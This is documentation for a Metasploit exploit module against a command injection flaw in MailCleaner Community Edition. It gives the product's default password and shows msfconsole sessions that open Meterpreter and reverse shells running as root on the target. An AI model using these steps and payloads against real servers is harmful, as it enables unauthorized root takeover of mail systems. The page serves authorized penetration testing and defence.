dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/http/mailcleaner_exec.md

3.0 KiB
Raw Permalink Blame History

Description

This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.

Vulnerable Application

You can download ISO file from following URL. https://www.mailcleaner.org/latest-downloads/

At the time of this writing all the passwords of users such as root or admin user was "MCPassw0rd".

Verification Steps

A successful check of the exploit will look like this:

  1. Start msfconsole
  2. use use exploit/linux/http/mailcleaner
  3. Set RHOST
  4. Set LHOST
  5. Set USERNAME
  6. Set PASSWORD
  7. Run exploit
  8. Verify that you are seeing Awesome..! Authenticated.
  9. Verify that you are getting meterpreter session.

Scenarios

msf5 > use exploit/linux/http/mailcleaner_exec 
msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
PASSWORD => qwe123
msf5 exploit(linux/http/mailcleaner_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:<password>
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.100:44974) at 2018-12-19 17:24:44 +0300
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300

meterpreter >

You can also use cmd payloads.

msf5 > use exploit/linux/http/mailcleaner_exec 
msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
msf5 exploit(linux/http/mailcleaner_exec) > set target 1
msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(linux/http/mailcleaner_exec) > run

[*] Started reverse TCP double handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo P6zixt2asYXZ29NE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "P6zixt2asYXZ29NE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (12.0.0.1:4444 -> 12.0.0.100:53996) at 2018-12-20 12:09:32 +0300

id
uid=0(root) gid=1003(mailcleaner) groups=1003(mailcleaner)